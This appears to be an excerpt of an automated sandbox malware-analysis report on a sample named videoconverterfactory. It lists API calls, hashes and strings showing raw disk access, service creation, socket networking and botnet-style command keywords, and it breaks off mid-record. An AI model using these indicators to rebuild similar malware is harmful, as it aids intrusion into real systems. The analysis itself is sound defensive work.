                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                                                      • String ID: \\.\PhysicalDrive0
                                                                                                      • API String ID: 4026078076-1180397377
                                                                                                      • Opcode ID: a4d6996506623cf9b606c8b4c4e80efbe0ca3c45c07d7a34d8f6b585772af10b
                                                                                                      • Instruction ID: aedeaa29a18e79e3709310f9e4d0b2116ca57d78d8514b36b6d843914ffc5d15
                                                                                                      • Opcode Fuzzy Hash: a4d6996506623cf9b606c8b4c4e80efbe0ca3c45c07d7a34d8f6b585772af10b
                                                                                                      • Instruction Fuzzy Hash: C2318275D00225EBDB24CF94D884BEEBBB8EF55758F20416AE505B7380D7B06E08CBA0
                                                                                                      APIs
                                                                                                      • CloseServiceHandle.SECHOST(00000000,?,?,?,000F01FF,00000010,00000002,00000001), ref: 0040D25D
                                                                                                      • CloseServiceHandle.ADVAPI32(?,?,?,?,000F01FF,00000010,00000002,00000001), ref: 0040D785
                                                                                                      • CreateServiceA.ADVAPI32(?,?,?,000F01FF,00000010,00000002,00000001), ref: 0040D812
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Service$CloseHandle$Create
                                                                                                      • String ID:
                                                                                                      • API String ID: 2095555506-0
                                                                                                      • Opcode ID: 67bc7c562a5f946bb062d4525a1ca536a8acf2dcbb2153a5e03ac2972f3ecf44
                                                                                                      • Instruction ID: 7cc6726410280f31de59b83ab0219a71bc523d850eae9e70992ee5b829060949
                                                                                                      • Opcode Fuzzy Hash: 67bc7c562a5f946bb062d4525a1ca536a8acf2dcbb2153a5e03ac2972f3ecf44
                                                                                                      • Instruction Fuzzy Hash: CAE04F30E88205F6DA242BC05D49F6A2D24A785B50F304837F617790D0DABE598EB52F

                                                                                                      Control-flow Graph

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$rGI$updips$updurls
                                                                                                      • API String ID: 0-3116384143
                                                                                                      • Opcode ID: 64436f895e7c584d1f0ce73e5e8509842a43e73e5bf24b378f03ae4eea623b55
                                                                                                      • Instruction ID: 8e06db7b802ef43053b464045f091c1025f300e1b64672f9a7ecd88a5e53eab8
                                                                                                      • Opcode Fuzzy Hash: 64436f895e7c584d1f0ce73e5e8509842a43e73e5bf24b378f03ae4eea623b55
                                                                                                      • Instruction Fuzzy Hash: 9E3226715083919FD7259F24D840BABBBE9EFA6318F14081DE5C99B381DB70DC49CBA2

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: _memset$CriticalSection$EnterLeave_malloc_strtok$_free_swscanf
                                                                                                      • String ID: <htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls
                                                                                                      • API String ID: 3441009308-1437582238
                                                                                                      • Opcode ID: 55f3e0307935c46c4ec1f2238cbf22fb63e4769cf9da768e29795ba82acd03f9
                                                                                                      • Instruction ID: 699dc09863e2038cd41476c78fb98dc06218c1c0de682892ee89e91f6a226fd5
                                                                                                      • Opcode Fuzzy Hash: 55f3e0307935c46c4ec1f2238cbf22fb63e4769cf9da768e29795ba82acd03f9
                                                                                                      • Instruction Fuzzy Hash: 33C179326483919BD712AB34E850B5B7BE9DFA671CF14041DF4859B381DF61DC09CBA2

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02D21D11
                                                                                                      • GetLastError.KERNEL32 ref: 02D21D23
                                                                                                        • Part of subcall function 02D21712: __EH_prolog.LIBCMT ref: 02D21717
                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02D21D59
                                                                                                      • GetLastError.KERNEL32 ref: 02D21D6B
                                                                                                      • __beginthreadex.LIBCMT ref: 02D21DB1
                                                                                                      • GetLastError.KERNEL32 ref: 02D21DC6
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 02D21DDD
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 02D21DEC
                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D21E14
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 02D21E1B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
                                                                                                      • String ID: thread$thread.entry_event$thread.exit_event
                                                                                                      • API String ID: 831262434-3017686385
                                                                                                      • Opcode ID: 0e3398d39433298358e0c0c75f689a630251df623b435fc65e7bee01e28dc04b
                                                                                                      • Instruction ID: 1d7b70049d0fceda17bfeda51b3e7182d0a2fb8281d13f5e7f0bd1ade66916ae
                                                                                                      • Opcode Fuzzy Hash: 0e3398d39433298358e0c0c75f689a630251df623b435fc65e7bee01e28dc04b
                                                                                                      • Instruction Fuzzy Hash: 163157759043119FD710EF20D848B2BBBE5EBA4754F108969F8598B391DB70EC49CFA2

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02D24608
                                                                                                        • Part of subcall function 02D327C5: _malloc.LIBCMT ref: 02D327DD
                                                                                                      • htons.WS2_32(?), ref: 02D24669
                                                                                                      • htonl.WS2_32(?), ref: 02D2468C
                                                                                                      • htonl.WS2_32(00000000), ref: 02D24693
                                                                                                      • htons.WS2_32(00000000), ref: 02D24747
                                                                                                      • _sprintf.LIBCMT ref: 02D2475D
                                                                                                        • Part of subcall function 02D27991: _memmove.LIBCMT ref: 02D279B1
                                                                                                      • htons.WS2_32(?), ref: 02D246B0
                                                                                                        • Part of subcall function 02D2873C: __EH_prolog.LIBCMT ref: 02D28741
                                                                                                        • Part of subcall function 02D2873C: RtlEnterCriticalSection.NTDLL(00000020), ref: 02D287BC
                                                                                                        • Part of subcall function 02D2873C: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02D287DA
                                                                                                        • Part of subcall function 02D21BA7: __EH_prolog.LIBCMT ref: 02D21BAC
                                                                                                        • Part of subcall function 02D21BA7: RtlEnterCriticalSection.NTDLL ref: 02D21BBC
                                                                                                        • Part of subcall function 02D21BA7: RtlLeaveCriticalSection.NTDLL ref: 02D21BEA
                                                                                                        • Part of subcall function 02D21BA7: RtlEnterCriticalSection.NTDLL ref: 02D21C13
                                                                                                        • Part of subcall function 02D21BA7: RtlLeaveCriticalSection.NTDLL ref: 02D21C56
                                                                                                        • Part of subcall function 02D2CEF8: __EH_prolog.LIBCMT ref: 02D2CEFD
                                                                                                      • htonl.WS2_32(?), ref: 02D2497C
                                                                                                      • htonl.WS2_32(00000000), ref: 02D24983
                                                                                                      • htonl.WS2_32(00000000), ref: 02D249C8
                                                                                                      • htonl.WS2_32(00000000), ref: 02D249CF
                                                                                                      • htons.WS2_32(?), ref: 02D249EF
                                                                                                      • htons.WS2_32(?), ref: 02D249F9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_memmove_sprintf
                                                                                                      • String ID:
                                                                                                      • API String ID: 1645262487-0
                                                                                                      • Opcode ID: f6a4c9a47b41df8d8ad50703171471094d170eae9585df642897456ea6c50293
                                                                                                      • Instruction ID: f7a827d7430b1143353d1c1470e73e764cc44d520f52bec0c195245b16788a3f
                                                                                                      • Opcode Fuzzy Hash: f6a4c9a47b41df8d8ad50703171471094d170eae9585df642897456ea6c50293
                                                                                                      • Instruction Fuzzy Hash: 53022771D00269EBEF15DBA4D854BEEBBB9EF28308F10415AE905B7280DB745E48CF61

                                                                                                      Control-flow Graph
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02D24D8B
                                                                                                      • RtlEnterCriticalSection.NTDLL(02D54FD0), ref: 02D24DB7
                                                                                                      • RtlLeaveCriticalSection.NTDLL(02D54FD0), ref: 02D24DC3
                                                                                                        • Part of subcall function 02D24BED: __EH_prolog.LIBCMT ref: 02D24BF2
                                                                                                        • Part of subcall function 02D24BED: InterlockedExchange.KERNEL32(?,00000000), ref: 02D24CF2
                                                                                                      • RtlEnterCriticalSection.NTDLL(02D54FD0), ref: 02D24E93
                                                                                                      • RtlLeaveCriticalSection.NTDLL(02D54FD0), ref: 02D24E99
                                                                                                      • RtlEnterCriticalSection.NTDLL(02D54FD0), ref: 02D24EA0
                                                                                                      • RtlLeaveCriticalSection.NTDLL(02D54FD0), ref: 02D24EA6
                                                                                                      • RtlEnterCriticalSection.NTDLL(02D54FD0), ref: 02D250A7
                                                                                                      • RtlLeaveCriticalSection.NTDLL(02D54FD0), ref: 02D250AD
                                                                                                      • RtlEnterCriticalSection.NTDLL(02D54FD0), ref: 02D250B8
                                                                                                      • RtlLeaveCriticalSection.NTDLL(02D54FD0), ref: 02D250C1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                                                      • String ID:
                                                                                                      • API String ID: 2062355503-0
                                                                                                      • Opcode ID: 64d634080501fb7635a5fcdb5c848500667d76c8985e38a1e3cc0f1d5b5509b4
                                                                                                      • Instruction ID: 12a7f6025800a04e744d6ca67d494f22813b08005867053ce22b81738079eff2
                                                                                                      • Opcode Fuzzy Hash: 64d634080501fb7635a5fcdb5c848500667d76c8985e38a1e3cc0f1d5b5509b4
                                                                                                      • Instruction Fuzzy Hash: 18B13A71D0422E9FEF25DFA0D844BEDBBB5AF14318F20409AE80566280DBB55E49CFA1

                                                                                                      Control-flow Graph
                                                                                                      APIs
                                                                                                      • FindResourceA.KERNEL32(?,0000000A), ref: 00401351
                                                                                                      • SizeofResource.KERNEL32(00000000), ref: 00401370
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Resource$FindSizeof
                                                                                                      • String ID:
                                                                                                      • API String ID: 3019604839-3916222277
                                                                                                      • Opcode ID: 138cf1d2708028cd6e9096853fa836b610bce6da07ce657d635f6670e06ad364
                                                                                                      • Instruction ID: b28a29316e79cb766f5da1f380b87f9e4da6436ce9bd12b8eed34f014587212c
                                                                                                      • Opcode Fuzzy Hash: 138cf1d2708028cd6e9096853fa836b610bce6da07ce657d635f6670e06ad364
                                                                                                      • Instruction Fuzzy Hash: 28810171D04258DFDF01CFE8D985AEEBBB0FB09315F1400AAE581B7262C3385A85DB69

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • RtlEnterCriticalSection.NTDLL(?), ref: 02D22706
                                                                                                      • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02D2272B
                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02D43173), ref: 02D22738
                                                                                                        • Part of subcall function 02D21712: __EH_prolog.LIBCMT ref: 02D21717
                                                                                                      • SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02D22778
                                                                                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 02D227D9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                                      • String ID: timer
                                                                                                      • API String ID: 4293676635-1792073242
                                                                                                      • Opcode ID: 98fd21c31b689c877025d1a1ee0ffcaa508a60d29ede3b54e46f78824e7f0670
                                                                                                      • Instruction ID: 7eb9db676fec1efe5a8026dccbde6766207fbc1c1ed527840a8274dac4ca2a4d
                                                                                                      • Opcode Fuzzy Hash: 98fd21c31b689c877025d1a1ee0ffcaa508a60d29ede3b54e46f78824e7f0670
                                                                                                      • Instruction Fuzzy Hash: 3A317CB5908715AFD3109F25D848B16BBE8FB58769F104A2AF85587B80D770EC18CFA1

                                                                                                      Control-flow Graph
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02D21BAC
                                                                                                      • RtlEnterCriticalSection.NTDLL ref: 02D21BBC
                                                                                                      • RtlLeaveCriticalSection.NTDLL ref: 02D21BEA
                                                                                                      • RtlEnterCriticalSection.NTDLL ref: 02D21C13
                                                                                                      • RtlLeaveCriticalSection.NTDLL ref: 02D21C56
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$EnterLeave$H_prolog
                                                                                                      • String ID:
                                                                                                      • API String ID: 1633115879-0
                                                                                                      • Opcode ID: 70495748563475fe7d3f167a0838410c3ea60c9b906b4de94efab64342a7127b
                                                                                                      • Instruction ID: 41814555de225317ef4dfbdd0a335df7a524bb8d2d6412da68fa0b80a482d5dd
                                                                                                      • Opcode Fuzzy Hash: 70495748563475fe7d3f167a0838410c3ea60c9b906b4de94efab64342a7127b
                                                                                                      • Instruction Fuzzy Hash: 00219C79900224AFDB14CF68D44479ABBB5FF59318F208549EC5997302D771ED09CBE0

                                                                                                      Control-flow Graph
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(0000EA60), ref: 02D26105
                                                                                                      • RtlEnterCriticalSection.NTDLL(02D54FD0), ref: 02D26110
                                                                                                      • RtlLeaveCriticalSection.NTDLL(02D54FD0), ref: 02D26121
                                                                                                      Strings
                                                                                                      • Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US), xrefs: 02D2612A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$EnterLeaveSleep
                                                                                                      • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                      • API String ID: 1566154052-1923541051
                                                                                                      • Opcode ID: c57c9d7763ad564e56383d8d19bdd40773bc315e08700403c1a5a84774377b08
                                                                                                      • Instruction ID: 178af37f4304ef886dc48ee7da11516ee07851976150f9d21b610f35c22550df
                                                                                                      • Opcode Fuzzy Hash: c57c9d7763ad564e56383d8d19bdd40773bc315e08700403c1a5a84774377b08
                                                                                                      • Instruction Fuzzy Hash: A3F096365483A19FDB018F78F445A9B7BE4FF5A314B640459F4CA8B301C7A0AC95CB91

                                                                                                      Control-flow Graph
                                                                                                      APIs
                                                                                                      • RegCloseKey.KERNELBASE(?), ref: 0040D5C0
                                                                                                      • RegQueryValueExA.KERNELBASE(?,Common AppData), ref: 0040DF7F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseQueryValue
                                                                                                      • String ID: Common AppData$VideoConverterFactory
                                                                                                      • API String ID: 3356406503-46554496
                                                                                                      • Opcode ID: 4bd605d6b248741e3a08392c033a23d08e08e71fb0696f03597aae14ee4ff204
                                                                                                      • Instruction ID: 1cbcf9b93556dadd5360716ed4734d65c90eaf86505e2607d357aa1c902eaf8f
                                                                                                      • Opcode Fuzzy Hash: 4bd605d6b248741e3a08392c033a23d08e08e71fb0696f03597aae14ee4ff204
                                                                                                      • Instruction Fuzzy Hash: 2DE04F70E4C511EBDB111BE04E04E6B7974AE54314721443BA953711D1C7BD940ABA6F

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • GetVersion.KERNEL32 ref: 00402A46
                                                                                                        • Part of subcall function 00403B64: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402A7F,00000000), ref: 00403B75
                                                                                                        • Part of subcall function 00403B64: HeapDestroy.KERNEL32 ref: 00403BB4
                                                                                                      • GetCommandLineA.KERNEL32 ref: 00402A94
                                                                                                      • GetStartupInfoA.KERNEL32(?), ref: 00402ABF
                                                                                                      • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402AE2
                                                                                                        • Part of subcall function 00402B3B: ExitProcess.KERNEL32 ref: 00402B58
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                                                      • String ID:
                                                                                                      • API String ID: 2057626494-0
                                                                                                      • Opcode ID: 5b516be980998e5fa11934bd411f48f35677f68372fd4b7f5b43ba3d9a21ae17
                                                                                                      • Instruction ID: 77a0c2ab577daa94e22818ed769fd4cb67ba6910a5c0d3980e0314dd63f46b93
                                                                                                      • Opcode Fuzzy Hash: 5b516be980998e5fa11934bd411f48f35677f68372fd4b7f5b43ba3d9a21ae17
                                                                                                      • Instruction Fuzzy Hash: 31214CB19006159EDB14AFA6DE4AA6E7FA9EB04715F10413EF905BB2D1DB384900CA6C
                                                                                                      APIs
                                                                                                      • WSASetLastError.WS2_32(00000000), ref: 02D22EEE
                                                                                                      • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02D22EFD
                                                                                                      • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02D22F0C
                                                                                                      • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02D22F36
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$Socketsetsockopt
                                                                                                      • String ID:
                                                                                                      • API String ID: 2093263913-0
                                                                                                      • Opcode ID: 87e8a629409ff24456542e19b8ea6cffbd39c688cd110f5ca2740f01afad4057
                                                                                                      • Instruction ID: a7073fb4483245bed6797f07021f1f9c40a756945623818746492219d4ad94b3
                                                                                                      • Opcode Fuzzy Hash: 87e8a629409ff24456542e19b8ea6cffbd39c688cd110f5ca2740f01afad4057
                                                                                                      • Instruction Fuzzy Hash: 66017576900214BBDB209F66DC88B5A7BA9EB95765F008965FA18CB281D7708D04CBA0
                                                                                                      APIs
                                                                                                        • Part of subcall function 02D22D39: WSASetLastError.WS2_32(00000000), ref: 02D22D47
                                                                                                        • Part of subcall function 02D22D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02D22D5C
                                                                                                      • WSASetLastError.WS2_32(00000000), ref: 02D22E6D
                                                                                                      • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02D22E83
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$Sendselect
                                                                                                      • String ID: 3'
                                                                                                      • API String ID: 2958345159-280543908
                                                                                                      • Opcode ID: cc7dcfbd18ddcc16e5243b233ba4f61068269010c6a125f0b18c2c15be4bc9a9
                                                                                                      • Instruction ID: fb29dbd2ff4b4dc3894560bc70d0ed3fdb860bba805b1a4c81b4020697c57122
                                                                                                      • Opcode Fuzzy Hash: cc7dcfbd18ddcc16e5243b233ba4f61068269010c6a125f0b18c2c15be4bc9a9
                                                                                                      • Instruction Fuzzy Hash: 92316AB1A002259FDB109F64C8587EEBBAAEF65358F00495AEC1497340E7759D58CBE0
                                                                                                      APIs
                                                                                                      • WSASetLastError.WS2_32(00000000,?,?,?,?,?,?,?,02D273D8,?,?,00000000), ref: 02D286D5
                                                                                                      • getsockname.WS2_32(?,?,?), ref: 02D286EB
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastgetsockname
                                                                                                      • String ID: &'
                                                                                                      • API String ID: 566540725-655172784
                                                                                                      • Opcode ID: 07a8033f257f0b722e61382a2b7af7109ecee59e4745f2b20ede812213a48216
                                                                                                      • Instruction ID: 71f68157f1aac218f20a8920e4d8837c80e5d0fa339d76aa2cf319489897fdb8
                                                                                                      • Opcode Fuzzy Hash: 07a8033f257f0b722e61382a2b7af7109ecee59e4745f2b20ede812213a48216
                                                                                                      • Instruction Fuzzy Hash: E0212176A042589FDB10DF68D854A8EB7F5FF58324F11856AE918EB380D730ED498B60
                                                                                                      APIs
                                                                                                      • WSASetLastError.WS2_32(00000000), ref: 02D22AEA
                                                                                                      • connect.WS2_32(?,?,?), ref: 02D22AF5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastconnect
                                                                                                      • String ID: 3'
                                                                                                      • API String ID: 374722065-280543908
                                                                                                      • Opcode ID: 38a16b72ffb78f267532147f384d2e6ae9e8ade2a1bea5d5b02f0eab57db9c07
                                                                                                      • Instruction ID: 798c5aac27902d1907c62c961bce7feb444c8bfe73ccd74ee9065a2aa60bcecf
                                                                                                      • Opcode Fuzzy Hash: 38a16b72ffb78f267532147f384d2e6ae9e8ade2a1bea5d5b02f0eab57db9c07
                                                                                                      • Instruction Fuzzy Hash: F221AA75E002245BCF10EF74D4186ADB7BADF54728F108599EC1897384DB745D09CFA1
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog
                                                                                                      • String ID:
                                                                                                      • API String ID: 3519838083-0
                                                                                                      • Opcode ID: aa15e0f8976d7b9fc5d1404d2d40803ed59f4ef60156dbd38c211a89264a748d
                                                                                                      • Instruction ID: f1fcfa71c85f3cd751a1d3d67b6a28f8c11fdc998872da9c75e5755b29b55cd0
                                                                                                      • Opcode Fuzzy Hash: aa15e0f8976d7b9fc5d1404d2d40803ed59f4ef60156dbd38c211a89264a748d
                                                                                                      • Instruction Fuzzy Hash: 87515AB1904266DFCB58CF68D4506AABBB5FF18324F10819EE8699B380D734DD14CFA0
                                                                                                      APIs
                                                                                                      • InterlockedIncrement.KERNEL32(?), ref: 02D236A7
                                                                                                        • Part of subcall function 02D22420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02D22432
                                                                                                        • Part of subcall function 02D22420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02D22445
                                                                                                        • Part of subcall function 02D22420: RtlEnterCriticalSection.NTDLL(?), ref: 02D22454
                                                                                                        • Part of subcall function 02D22420: InterlockedExchange.KERNEL32(?,00000001), ref: 02D22469
                                                                                                        • Part of subcall function 02D22420: RtlLeaveCriticalSection.NTDLL(?), ref: 02D22470
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                                                                      • String ID:
                                                                                                      • API String ID: 1601054111-0
                                                                                                      • Opcode ID: 38d9b1aca486574b98f311cac7cf199c1511287f21e1315f660f48035be80cf6
                                                                                                      • Instruction ID: ff7476988b253e64514b797884168552fa86f740f056eeb0384ff34adada766c
                                                                                                      • Opcode Fuzzy Hash: 38d9b1aca486574b98f311cac7cf199c1511287f21e1315f660f48035be80cf6
                                                                                                      • Instruction Fuzzy Hash: D81104B5100248ABDF218E14DC45FAA3BAAEB30358F104456FD418B390C738EC68CB90
                                                                                                      APIs
                                                                                                      • __beginthreadex.LIBCMT ref: 02D31116
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,00000002,02D2998E,00000000), ref: 02D31147
                                                                                                      • ResumeThread.KERNELBASE(?,?,?,?,?,00000002,02D2998E,00000000), ref: 02D31155
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandleResumeThread__beginthreadex
                                                                                                      • String ID:
                                                                                                      • API String ID: 1685284544-0
                                                                                                      • Opcode ID: 6329790a470c0c4e3f47668c909b0381a60f69ca925b826b0bda9d518365272d
                                                                                                      • Instruction ID: b5d0308af0e04b2bc8def82ccbda8e1ff7a50982324b358c9aebc9283394534d
